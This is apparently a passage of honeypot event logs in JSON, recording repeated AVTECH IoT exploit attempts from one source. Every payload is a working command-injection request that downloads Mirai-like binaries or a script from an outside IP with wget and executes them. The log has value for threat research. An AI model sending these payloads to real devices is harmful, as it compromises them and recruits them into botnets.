- "last_seen": "2020-06-01T00:38:50Z"
- },
- {
- "event_id": "f1438cb8fae2bd65f12f5bec02a360085c3feec695d5b5def5c30b647dce0b10",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:28Z",
- "last_seen": "2020-06-01T00:38:28Z"
- },
- {
- "event_id": "c2dff605f1fc624758a7dc1d377bf15340e8c9dd57d727ffbff0fea298c543ff",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:26Z",
- "last_seen": "2020-06-01T00:38:26Z"
- },
- {
- "event_id": "0160295d44a8212750704e6f23e3cb019825dea440fd0fbeff9e8a6fbdf1fe2f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:16Z",
- "last_seen": "2020-06-01T00:38:16Z"
- },
- {
- "event_id": "24c5f2dda353dd532dce8aa607ea69c829d2284cdf6cc2a41e38a8fff8a68938",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:15Z",
- "last_seen": "2020-06-01T00:38:15Z"
- },
- {
- "event_id": "0ac8c79d372f3b2506e01a0e0ff52a942b7297d00d6e62149b82920d58d02080",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:14Z",
- "last_seen": "2020-06-01T00:38:14Z"
- },
- {
- "event_id": "76d5c86e126d4df47c25bd78231c8475ebc464098a62bdf98f64d849c11ef504",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:12Z",
- "last_seen": "2020-06-01T00:38:12Z"
- },
- {
- "event_id": "135db2f82093bb85f19d94248be67b7065f1c1d599831d0e10bb2c11b2bc273c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:12Z",
- "last_seen": "2020-06-01T00:38:12Z"
- },
- {
- "event_id": "3d83601e64eab47907247858ed2c0c44656b9a8faed239d328791a33a3e25c0a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:09Z",
- "last_seen": "2020-06-01T00:38:09Z"
- },
- {
- "event_id": "e3a7b5546e567154e13edc8c5b796465ea67a3a113d29cf91b5919194f408dea",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:37:48Z",
- "last_seen": "2020-06-01T00:37:48Z"
- },
- {
- "event_id": "9323f8938a9226e92fa998633f5e644582e6b9d522231445c55c03150579e17f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 38.UnHAnaAW.arm5; chmod 777 38.UnHAnaAW.arm5; ./38.UnHAnaAW.arm5 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:37:46Z",
- "last_seen": "2020-06-01T00:37:46Z"
- },
- {
- "event_id": "e78d9021d1d877afac98ba72758d3aa2e47b1ea0eed9ab171941e4708bf7d611",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:19Z",
- "last_seen": "2020-06-01T00:36:19Z"
- },
- {
- "event_id": "a775c5e7fd9780fd1af283314b732e8f679d6e6f1046c391217b529101cac586",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:18Z",
- "last_seen": "2020-06-01T00:36:18Z"
- },
- {
- "event_id": "e972d42bc32f9629769781194f945e2864cd1f02e2bdb18d33616698133c5e86",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:17Z",
- "last_seen": "2020-06-01T00:36:17Z"
- },
- {
- "event_id": "fd6bc925c63a2f2e563114882f2ef75e3c87731081559f1a5f49473ed059b9b0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:14Z",
- "last_seen": "2020-06-01T00:36:14Z"
- },
- {
- "event_id": "f81e5c3aa6c3562b380ac999940cea47bf8722947be23fc9c455e3219ec26d2d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:12Z",
- "last_seen": "2020-06-01T00:36:12Z"
- },
- {
- "event_id": "e1f66b47b9d819748f7faf19509e03385abe6c322d73427a5806f75de003e24a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:11Z",
- "last_seen": "2020-06-01T00:36:11Z"
- },
- {
- "event_id": "050c57534c4e5dab03f753050f6052fc188ab3064356105057a0479506286d01",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:10Z",
- "last_seen": "2020-06-01T00:36:10Z"
- },
- {
- "event_id": "eacd113099db6e8ff062a5e9f21dab6e8b591dc10739f1f73581ba5eb2269eee",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:09Z",
- "last_seen": "2020-06-01T00:36:09Z"
- },
- {
- "event_id": "5e21740462d98af5515d18a676c5ecfbbe024ce81a36c0b819f0dd048d7910cb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:36:07Z",
- "last_seen": "2020-06-01T00:36:07Z"
- },
- {
- "event_id": "1300c0669cf0c6246e3c7d6525a0373ef782b6300d9902f2360ce264ed8e21d1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:35:46Z",
- "last_seen": "2020-06-01T00:35:46Z"
- },
- {
- "event_id": "6cab9ce13a7a1c2db4a2b743cece3deb7200184f9a7e76c87b96a278571cc4ee",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:35:44Z",
- "last_seen": "2020-06-01T00:35:44Z"
- },
- {
- "event_id": "f919e6d01aeea2286eccd3d0d78f942159d31650730f977c1b710a6f09990cb7",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:35:38Z",
- "last_seen": "2020-06-01T00:35:38Z"
- },
- {
- "event_id": "86927cd2c8b7adf02c5cf2e52f9f47e8e098d59b04d0ea536d3ffe4e07661420",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:35:36Z",
- "last_seen": "2020-06-01T00:35:36Z"
- },
- {
- "event_id": "a0805bd6c1c897f2c6cf98e3ff3ab8ea28f89db913f9db9ad2d87a04cb1e785f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8089,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-05-31T22:45:48Z",
- "last_seen": "2020-05-31T23:00:33Z"
- },
- {
- "event_id": "7aa5002cfc755896c89dd24f2a27a87bc44b38b3f620a718c697e6960a407aa5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-05-31T22:36:42Z",
- "last_seen": "2020-05-31T22:59:30Z"
- },
- {
- "event_id": "cd10b9f43fac6af92783e29557ab7297d31e876dfceba1d41f7fba3eda85d27b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:41:06Z",
- "last_seen": "2020-05-31T22:59:30Z"
- },
- {
- "event_id": "48f860ad13ef904aea2643397438b5392cd7b318067814434587959ad75b1ef6",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16992,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:57:17Z",
- "last_seen": "2020-05-31T22:57:17Z"
- },
- {
- "event_id": "ecc522117abeb0c49147a0d3defe88de2852ec61455b44d32a6c9a8f4de3c189",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5900,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:48:02Z",
- "last_seen": "2020-05-31T22:57:13Z"
- },
- {
- "event_id": "8d34ac782d9fe1dacc9d10f82e2cc96b47adf7d18f6a00178ca05527f04d5884",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:56:57Z",
- "last_seen": "2020-05-31T22:56:57Z"
- },
- {
- "event_id": "76db7cd4ee6a655bed0ec26361c1022e1448f5b3f1df69714f4dfb0e03db094b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5269,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:52:16Z",
- "last_seen": "2020-05-31T22:52:16Z"
- },
- {
- "event_id": "ee02438f7fd8d6c0bb97de04b16f1486f3b706026fe7c80636805024cba59c66",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:50:43Z",
- "last_seen": "2020-05-31T22:50:43Z"
- },
- {
- "event_id": "573ca3b75565fbcd1e9dd2a6cf09c00bf3c93fab379095925910212169818cfb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8779,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:50:42Z",
- "last_seen": "2020-05-31T22:50:42Z"
- },
- {
- "event_id": "a15f46098048cf1981053e9de5d69048ecd104592b432a02e8b5d20639008409",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:36:48Z",
- "last_seen": "2020-05-31T22:50:41Z"
- },
- {
- "event_id": "31db9983adc5ea3f299c4f07b337dc145c9fc534f69ac29d1f22de78e8092105",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:50:16Z",
- "last_seen": "2020-05-31T22:50:16Z"
- },
- {
- "event_id": "36ea58a6c6cdfc2b976f70bc45bc6c6f984e61eba1f992839629486f2840cb55",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:50:15Z",
- "last_seen": "2020-05-31T22:50:15Z"
- },
- {
- "event_id": "5e7e658c42096815dc1bae1417fe0ba2e61800cd979b91b23554b7018a1f9780",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 1400,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:49:48Z",
- "last_seen": "2020-05-31T22:49:48Z"
- },
- {
- "event_id": "1404a9a75d3efafcc0134f3aa1b82d4a0df9ea6ba25e76c6d005dc92aa8d8f3a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
